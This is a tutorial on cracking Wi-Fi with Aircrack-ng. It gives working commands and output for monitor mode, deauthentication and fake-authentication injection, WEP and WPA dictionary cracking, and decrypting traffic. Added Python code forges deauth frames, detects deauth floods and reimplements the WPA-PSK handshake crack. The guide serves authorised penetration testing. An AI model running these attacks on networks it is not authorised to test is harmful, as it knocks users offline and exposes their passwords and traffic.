
Aircrack-ng : Cracking WEP , WPA/WPA2 WiFi Passwords

Aircrack-ng is an open-source Wi-Fi security suite for monitoring, packet capture, injection, and password cracking. Use ethically for network testing

This guide explains the core Aircrack-ng commands: how each works, why it is used, and how to read its output. It covers five tools from the suite: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and airdecap-ng.

1. airmon-ng: Monitor Mode Management

Purpose:

The airmon-ng tool enables and manages monitor mode on wireless interfaces, which is essential for packet capturing and injection. Monitor mode allows a wireless adapter to listen to all wireless traffic in its range, irrespective of whether it is intended for the device.

Syntax:

sudo airmon-ng start <interface>

Example:

sudo airmon-ng start wlan0

Output:

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Breakdown:

  • PHY / Interface: The physical radio (phy0) and the network interface on it that is being switched to monitor mode.
  • Driver: The kernel driver managing the interface (e.g., ath9k). mac80211-based drivers are the ones that reliably support monitor mode and injection; if injection fails later, check the driver against the Aircrack-ng compatibility list.
  • Chipset: The wireless chipset (e.g., Qualcomm Atheros).
  • wlan0mon: The monitor-mode interface airmon-ng creates (older versions named it mon0). Every later command uses this name, not wlan0.
  • Interfering processes: Before the table, airmon-ng prints "Found N processes that could cause trouble" with the PIDs of processes such as NetworkManager and wpa_supplicant. It does not kill them for you. Left running, they can hop channels or put the card back into managed mode mid-capture, so run sudo airmon-ng check kill first (see Troubleshooting) and restart NetworkManager when you are done.

2. airodump-ng: Network Monitoring and Packet Capture

Purpose:

airodump-ng listens for wireless network traffic, identifying networks in range and capturing packets. It provides details about each network, such as SSID, encryption type, and connected devices.

Syntax:

sudo airodump-ng <interface>

Example:

sudo airodump-ng wlan0mon

Output:

 CH  8 ][ Elapsed: 2 mins ][ 2024-11-17 11:35 ][ wlan0mon ]

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH ESSID
 12:34:56:78:90:AB  -45      120      200       6   54e  WPA2 CCMP   PSK  TargetNetwork
 DE:AD:BE:EF:01:02  -65      80       90        11  54e  WEP  WEP     OPN  OpenNetwork

Breakdown:

  • BSSID: The MAC address of the access point.
  • PWR: Signal level in dBm; values closer to 0 are stronger. -1 means the driver does not report signal level.
  • Beacons: Periodic frames the access point sends to announce its presence.
  • #Data: Number of data frames captured (for WEP, the frames that carry usable IVs).
  • #/s: Data frames per second, measured over the last 10 seconds.
  • CH: Channel the network is on.
  • MB: Maximum rate the AP supports; an "e" suffix means QoS (WMM) is enabled.
  • ENC: Encryption type (WPA3, WPA2, WPA, WEP, or OPN for open networks).
  • CIPHER: Cipher in use: CCMP for WPA2 (and WPA3), TKIP for WPA, WEP for WEP.
  • AUTH: Authentication method: PSK for a pre-shared key, MGT for 802.1X/enterprise, SAE for WPA3, and OPN or SKA (open-system or shared-key) for WEP. It is often blank until a client has been seen authenticating.
  • ESSID: Network name (SSID). <length: N> means a hidden SSID; airodump-ng fills it in once a client connects and reveals it.

Capturing Packets for a Specific Network:

sudo airodump-ng -c <channel> --bssid <BSSID> -w <output prefix> <interface>

Example:

sudo airodump-ng -c 6 --bssid 12:34:56:78:90:AB -w capture wlan0mon

Output:

 CH  6 ][ Elapsed: 1 min ][ 2024-11-17 11:45 ][ WPA handshake: 12:34:56:78:90:AB

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH ESSID
 12:34:56:78:90:AB  -50       30      150      6    54e  WPA2 CCMP   PSK  TargetNetwork

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 12:34:56:78:90:AB  34:56:78:90:AB:CD  -52   54e-54e     0      150  EAPOL

Breakdown:

  • -c and --bssid: Lock the card to one channel and one AP, so no handshake frames are missed while channel hopping.
  • -w capture: A file-name prefix, not a file. airodump-ng writes capture-01.cap (the packets, including any handshake) plus text summaries such as capture-01.csv next to it; the number increments on every run.
  • STATION: Clients currently associated with the AP. A handshake can only be captured when a client connects or reconnects, so an AP with no stations yields nothing until one arrives, or an existing one is forced to reconnect with aireplay-ng --deauth.
  • WPA handshake: Shown in the header once airodump-ng has captured the four-way handshake (EAPOL) frames for that BSSID; the Notes column marks the client that produced them. That capture file is the input aircrack-ng needs for WPA/WPA2.
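
The -w prefix also produces capture-01.csv, which is easier to post-process than the live screen. The parser below is an added example, not code from the original page or from the Aircrack-ng project: it reads that CSV layout (an access-point table, a blank line, then a station table), attaches each station to its AP, and picks the WPA/WPA2-PSK networks that actually have a client, since those are the only ones where a handshake can be captured. The CSV text is constructed here to mirror the tables above; the timestamps and the third AP are assumed values.

```python
import csv
import io
from dataclasses import dataclass, field


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str      # airodump-ng "Privacy" column: OPN, WEP, WPA, WPA2, WPA2WPA, ...
    cipher: str
    auth: str         # PSK, MGT, OPN, SKA (blank until seen)
    power: int
    essid: str
    clients: list = field(default_factory=list)


@dataclass
class Station:
    mac: str
    power: int
    bssid: str        # "(not associated)" for clients that are only probing
    probed: list


def parse_airodump_csv(text: str):
    """Parse <prefix>-01.csv: an access-point table, a blank line, then a station table."""
    aps, stations, section = {}, [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not any(cell.strip() for cell in row):
            continue                                  # blank separator line between the tables
        row = [cell.strip() for cell in row]
        if row[0] == "BSSID":
            section = "ap"
            continue
        if row[0] == "Station MAC":
            section = "sta"
            continue
        if section == "ap":
            # An ESSID containing commas would shift these indexes; the ID-length
            # column (row[12]) is what disambiguates such rows in a full parser.
            aps[row[0]] = AccessPoint(bssid=row[0], channel=int(row[3]), privacy=row[5],
                                      cipher=row[6], auth=row[7], power=int(row[8]),
                                      essid=row[13])
        elif section == "sta":
            stations.append(Station(mac=row[0], power=int(row[3]), bssid=row[5],
                                    probed=[p for p in row[6:] if p]))
    for sta in stations:
        if sta.bssid in aps:
            aps[sta.bssid].clients.append(sta.mac)
    return aps, stations


def handshake_candidates(aps: dict) -> list:
    """WPA/WPA2-PSK networks with at least one associated client, strongest first:
    the only ones where a four-way handshake can be captured (or forced by a deauth)."""
    return [ap for ap in sorted(aps.values(), key=lambda a: a.power, reverse=True)
            if "WPA" in ap.privacy and ap.auth == "PSK" and ap.clients]


# Constructed sample in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
12:34:56:78:90:AB, 2024-11-17 11:33:01, 2024-11-17 11:35:00,  6,  54, WPA2, CCMP, PSK, -45,      120,      200,   0.  0.  0.  0,  13, TargetNetwork,
DE:AD:BE:EF:01:02, 2024-11-17 11:33:05, 2024-11-17 11:35:00, 11,  54, WEP , WEP , OPN, -65,       80,       90,   0.  0.  0.  0,  11, OpenNetwork,
AA:BB:CC:DD:EE:FF, 2024-11-17 11:33:07, 2024-11-17 11:35:00,  1,  54, WPA2, CCMP, PSK, -70,       60,        5,   0.  0.  0.  0,   9, LonelyAP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
34:56:78:90:AB:CD, 2024-11-17 11:33:10, 2024-11-17 11:34:59, -52,      150, 12:34:56:78:90:AB,TargetNetwork
00:11:22:33:44:55, 2024-11-17 11:34:00, 2024-11-17 11:34:30, -80,        3, (not associated),HomeWifi,Cafe
"""

if __name__ == "__main__":
    aps, _ = parse_airodump_csv(SAMPLE_CSV)
    for ap in handshake_candidates(aps):
        print(f"{ap.bssid}  ch {ap.channel:>2}  {ap.power} dBm  {ap.essid}  clients={ap.clients}")
```

On the sample, only TargetNetwork qualifies: OpenNetwork is WEP (no handshake to capture) and LonelyAP has no associated station. The unassociated client probing for HomeWifi and Cafe is the kind of entry worth keeping for an evil-twin assessment, but it is useless for handshake capture.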

3. aireplay-ng: Packet Injection and Replay

Purpose:

aireplay-ng injects packets into a network, enabling traffic generation or targeted attacks like deauthentication.

a. Deauthentication Attack

A deauth attack sends forged deauthentication management frames, in the AP's name to the client and in the client's name to the AP, so the client drops its association and reconnects. The reconnection produces a fresh four-way handshake for airodump-ng to capture. Management frames are unencrypted and need no key, which is why this works against WPA/WPA2 at all. It does not work where Protected Management Frames (802.11w) are in use, which WPA3 requires and many WPA2 networks enable: a protected deauth carries a MIC, and forged unprotected ones are discarded.

Syntax:

sudo aireplay-ng --deauth <count> -a <BSSID> [-c <client MAC>] <interface>

Example:

sudo aireplay-ng --deauth 10 -a 12:34:56:78:90:AB -c 34:56:78:90:AB:CD wlan0mon

Output:

11:47:02  Waiting for beacon frame (BSSID: 12:34:56:78:90:AB) on channel 6
11:47:03  Sending 64 directed DeAuth (code 7). STMAC: [34:56:78:90:AB:CD] [ 3|62 ACKs]
11:47:03  Sending 64 directed DeAuth (code 7). STMAC: [34:56:78:90:AB:CD] [ 5|64 ACKs]
...
  • count: Each count is one round of 64 frames to the client and 64 to the AP; 0 keeps sending until interrupted. A few rounds are usually enough; more only keeps the client off the network longer.
  • -a: The access point's BSSID. aireplay-ng first waits for one of its beacons, so the monitor interface must be on the AP's channel (the one airodump-ng is locked to).
  • -c: Optional; targets one client. Without it the deauth is broadcast, which is noisier and ignored by many clients.
  • code 7: The reason code in the frames, "class 3 frame received from nonassociated station".
  • [ x|y ACKs]: Acknowledgements received from the client and from the AP respectively. 0|0 means neither heard the frames (wrong channel, out of range, or PMF in use); a high AP count with a low client count means the client is too far away to hear you.
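
What those frames look like on the wire, as an added example that is not part of the original page or of aireplay-ng's code: it packs a raw 802.11 deauthentication frame (24-byte management header plus the 2-byte reason code), parses one back, builds one client/AP round the way the -c option sends it, and, from the defender's side, counts deauth frames per BSSID to flag a flood. The duration value and the burst threshold are assumed; the MACs are the page's example addresses. These are unprotected frames, so a PMF-capable AP or client would drop them.

```python
import struct

FC_DEAUTH = 0x00C0            # Frame Control: type 0 (management), subtype 12 (deauthentication), no flags
REASON_CLASS3_NONASSOC = 7    # "Class 3 frame received from nonassociated STA", the code aireplay-ng uses
HDR = "<HH6s6s6sH"            # FC, duration/ID, addr1 (receiver), addr2 (transmitter), addr3 (BSSID), seq ctl


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, reason: int = REASON_CLASS3_NONASSOC, seq: int = 0) -> bytes:
    """Raw 802.11 deauthentication frame: management header plus reason code.
    No radiotap header and no FCS; the injecting driver adds those. Duration 0x013A is an assumed value."""
    header = struct.pack(HDR, FC_DEAUTH, 0x013A, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)


def parse_deauth(frame: bytes):
    """Return addresses, sequence number and reason code if this is a deauth frame, else None."""
    if len(frame) < 26:
        return None
    fc, _dur, a1, a2, a3, seqctl = struct.unpack_from(HDR, frame, 0)
    if fc & 0x00FC != FC_DEAUTH:          # keep type/subtype bits, ignore protocol version and flags
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {"dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3),
            "seq": seqctl >> 4, "reason": reason}


def deauth_round(ap: str, client: str, seq: int) -> list:
    """One directed round: a frame to the client spoofing the AP, and one to the AP spoofing the client."""
    return [build_deauth(client, ap, ap, seq=seq), build_deauth(ap, client, ap, seq=seq)]


def flag_deauth_flood(frames: list, threshold: int = 10) -> dict:
    """Defender's view: count deauth frames per BSSID and return those at or over the threshold.
    Legitimate deauths are rare; dozens within seconds against one BSSID is an injection tool."""
    counts = {}
    for f in frames:
        d = parse_deauth(f)
        if d:
            counts[d["bssid"]] = counts.get(d["bssid"], 0) + 1
    return {b: n for b, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    AP, CLIENT = "12:34:56:78:90:AB", "34:56:78:90:AB:CD"
    frames = [f for i in range(10) for f in deauth_round(AP, CLIENT, i)]
    print(parse_deauth(frames[0]))
    print(flag_deauth_flood(frames))
```

A wireless IDS does essentially what flag_deauth_flood does, with a sliding time window instead of a flat count; the same parser also catches the broadcast variant, since addr1 is then FF:FF:FF:FF:FF:FF but addr3 still names the BSSID.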

b. Fake Authentication Attack

Fake authentication makes the AP treat the injecting card as an associated client, so that the AP accepts the frames it sends. This matters for WEP: an AP drops data frames from unassociated stations (reason code 7 above is exactly that rejection), and the ARP request replay attack (aireplay-ng -3) that generates IVs only works once you are associated. Against WPA/WPA2 the open-system authentication and association still "succeed", but without the PSK no data can follow, so the attack is useful for WEP only.

Syntax:

sudo aireplay-ng --fakeauth <delay> -a <BSSID> -h <source MAC> <interface>

Example:

sudo aireplay-ng --fakeauth 0 -a 12:34:56:78:90:AB -h 34:56:78:90:AB:CD wlan0mon

Output:

11:50:01  Waiting for beacon frame (BSSID: 12:34:56:78:90:AB) on channel 6

11:50:01  Sending Authentication Request (Open System) [ACK]
11:50:01  Authentication successful
11:50:01  Sending Association Request [ACK]
11:50:01  Association successful :-) (AID: 1)
  • delay: 0 authenticates once; a non-zero value re-authenticates every that many seconds, which keeps the association alive on APs that drop idle clients.
  • -h: The source MAC to associate with. It should be the monitor interface's own MAC (or change the card's MAC to match): the card only ACKs frames addressed to itself, so with a foreign address the AP keeps retransmitting and injection stalls.
  • MAC filtering: If the AP never answers or association fails, it may filter by MAC. Then -h with the address of a client that was seen associated (as in this example) works once that client is off the network.
  • [ACK]: Confirms the AP acknowledged the frame; without it you are on the wrong channel or out of range.

4. aircrack-ng: Password Cracking

Purpose:

aircrack-ng recovers WEP and WPA/WPA2-PSK keys from capture files. For WEP it runs a statistical attack (PTW by default, the older FMS/KoreK attacks with -K) on the captured IVs, so what it needs is more IVs, not a wordlist. For WPA/WPA2 there is no such shortcut: it derives a key from each wordlist entry and checks it against the captured four-way handshake.

Syntax:

sudo aircrack-ng [-w <wordlist>] [-b <BSSID>] <capture file> [<capture file> ...]

Run with only the capture file and aircrack-ng lists every network it found, with the IV count or "WPA (1 handshake)" next to each, and asks which one to attack; -b (or -e <ESSID>) skips that prompt. Several capture files can be given at once, which is how IVs from multiple airodump-ng runs are combined.

a. WEP Cracking

WEP cracking needs enough unique IVs (Initialization Vectors): with PTW, on the order of tens of thousands for a 40-bit key and roughly twice that for a 104-bit key. Idle networks rarely produce that many on their own, which is why the fake-authentication step is followed by an ARP request replay (aireplay-ng -3) that makes the AP generate them; airodump-ng's #Data column shows how many have been collected.

Example:

sudo aircrack-ng -b 12:34:56:78:90:AB capture-01.cap

Output:

KEY FOUND! [ 11:22:33:44:55 ]
Decrypted correctly: 100%
  • KEY FOUND: The key in hex (a 40-bit key here); use it with airdecap-ng -w.
  • Decrypted correctly: aircrack-ng verifies the key by decrypting captured data frames, so 100% means it is right.
  • Failed. Next try with N IVs: Not enough IVs yet. Leave airodump-ng and the replay attack running; aircrack-ng re-reads the growing capture file and retries automatically.

b. WPA/WPA2 Cracking

Uses a dictionary file to test candidate passphrases against the captured handshake. Each candidate costs a PBKDF2 derivation of 4096 HMAC-SHA1 rounds, so a CPU manages only a few thousand keys per second per core; a large wordlist against a strong passphrase will not finish, and the only way to learn that the passphrase is not in the list is to reach its end. For long lists the usual move is to crack the handshake with hashcat on a GPU instead.

Example:

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 12:34:56:78:90:AB capture-01.cap

Output:

Reading packets, please wait...
Opening capture-01.cap
Read N packets.

   #  BSSID              ESSID                     Encryption

   1  12:34:56:78:90:AB  TargetNetwork             WPA (1 handshake)

                           KEY FOUND! [ mysecurepassword ]
  • -w: Path to the dictionary file. Entries shorter than 8 or longer than 63 characters cannot be WPA passphrases and are skipped.
  • -b: BSSID of the target network; required when the capture holds more than one.
  • WPA (1 handshake): The capture contains a usable handshake for that network. "WPA (0 handshake)" means the EAPOL frames are missing or incomplete; go back to airodump-ng and deauth a client.
  • Passphrase not in dictionary: The wordlist was exhausted without a match. The handshake is still valid; try another list or a rule-based attack.
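
What aircrack-ng does for each wordlist entry, as an added example that is not part of the original page or of the Aircrack-ng code: derive the PMK with PBKDF2-HMAC-SHA1 over the SSID, expand it with the 802.11i PRF into the PTK using both MACs and both nonces, and check the 16-byte MIC on message 2 of the handshake with the KCK (first 16 bytes of the PTK). Message 2 is constructed in the block from the page's example BSSID, client MAC and passphrase with assumed nonces, standing in for the EAPOL frame airodump-ng would have written to capture-01.cap; everything else is the real derivation, and the test checks it against the IEEE 802.11i PMK test vector.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the slow step repeated per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 over min/max of the two MACs and the two nonces.
    Only the first 16 bytes (the KCK) are needed to verify a handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


# EAPOL-Key layout: EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81 bytes before the MIC.
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. The key descriptor version
    (low 3 bits of Key Info) selects HMAC-MD5 (1, TKIP) or HMAC-SHA1 truncated to 128 bits (2, CCMP)."""
    keyver = struct.unpack_from(">H", eapol, 5)[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    algo = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, algo).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, candidates):
    """Dictionary attack as aircrack-ng -w performs it: PMK -> KCK per candidate, compare the MIC on message 2."""
    target_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for pw in candidates:
        if not 8 <= len(pw) <= 63:      # WPA passphrases are 8..63 characters; skip the rest up front
            continue
        kck = derive_ptk(pmk_from_passphrase(pw, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), target_mic):
            return pw
    return None


def build_eapol_msg2(snonce: bytes, kck: bytes, keyver: int = 2) -> bytes:
    """Constructed supplicant message 2 (RSN descriptor, Pairwise and MIC flags set) carrying a valid MIC."""
    key_info = 0x0108 | keyver
    body = (struct.pack(">BHHQ", 2, key_info, 16, 1) + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + struct.pack(">H", 0))
    frame = struct.pack(">BBH", 2, 3, len(body)) + body      # EAPOL version 2, type 3 (EAPOL-Key)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


# Constructed handshake parameters (assumed values, not from a real capture).
SSID = "TargetNetwork"
AA = bytes.fromhex("1234567890AB")      # authenticator (AP) MAC from the page's example
SPA = bytes.fromhex("34567890ABCD")     # supplicant (client) MAC from the page's example
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def sample_handshake() -> bytes:
    kck = derive_ptk(pmk_from_passphrase("mysecurepassword", SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, kck)


if __name__ == "__main__":
    msg2 = sample_handshake()
    print(crack_psk(SSID, AA, SPA, ANONCE, SNONCE, msg2, ["password", "short", "12345678", "mysecurepassword"]))
```

Two things the code makes visible that the command line hides: the SSID is the PBKDF2 salt, so a precomputed table is only good for one network name (airolib-ng exploits exactly that for common SSIDs), and the check needs both nonces plus the MIC, which is why airodump-ng must see message 2 and at least one of messages 1 or 3 before it reports a handshake.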

5. airdecap-ng: Decrypting Packets

Purpose:

airdecap-ng strips WEP or WPA/WPA2 encryption from a capture once the key is known and writes the plaintext frames to <name>-dec.cap (here capture-01-dec.cap) for inspection in Wireshark. For WPA/WPA2 it derives each client's session keys from that client's four-way handshake, so only traffic of clients whose handshake is in the capture is decrypted; sessions that began before the capture started stay encrypted.

Syntax:

sudo airdecap-ng -e <ESSID> -p <passphrase> <capture file>    (WPA/WPA2)
sudo airdecap-ng -w <hex key> <capture file>                   (WEP)

Example:

sudo airdecap-ng -e TargetNetwork -p mysecurepassword capture-01.cap

Output:

Total number of stations seen            1
Total number of packets read           500
Total number of WEP data packets         0
Total number of WPA data packets       500
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets       500
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0
  • -e: The ESSID. It is the PBKDF2 salt for the PMK, so it must match exactly, case included.
  • -p: The WPA passphrase; -w takes the WEP key in hex instead.
  • -b: Optional; restrict to one BSSID when the capture holds several networks.
  • -l: Keep the 802.11 headers instead of converting the output to plain Ethernet frames.
  • Decrypted WPA packets lower than WPA data packets: Those frames belong to clients whose handshake was not captured, or to a later rekey; capture from before the client connects to get them.

Common Troubleshooting Outputs

"No Wireless Interfaces Found"

  • Ensure your Wi-Fi card and driver support monitor mode and injection (USB adapters with Atheros or Ralink/MediaTek chipsets are the usual choice). In a virtual machine the virtual NIC has no radio; pass a USB adapter through to the guest.
  • Run ip a or iw dev to list wireless interfaces (ifconfig and iwconfig are the older equivalents).

"Could Not Set Monitor Mode"

  • Stop the interfering processes (e.g., NetworkManager, wpa_supplicant) first:
    sudo airmon-ng check kill
  • Confirm the result with iw dev: the interface should show "type monitor". When finished, sudo airmon-ng stop wlan0mon returns the card to managed mode; NetworkManager then has to be started again by hand.

Network is listed but "WPA handshake" never appears

  • Lock airodump-ng to the AP's channel with -c, check that a client is actually associated, deauth that client, and keep airodump-ng running until the handshake shows up. If deauths are acknowledged but the client never reconnects in the capture, the network probably uses Protected Management Frames.

Final Notes

Each command in the Aircrack-ng suite serves a specific purpose in the workflow of wireless security testing. Properly understanding these tools and their outputs is key to effective penetration testing. Always ensure ethical and lawful usage, and obtain explicit permission before testing any network.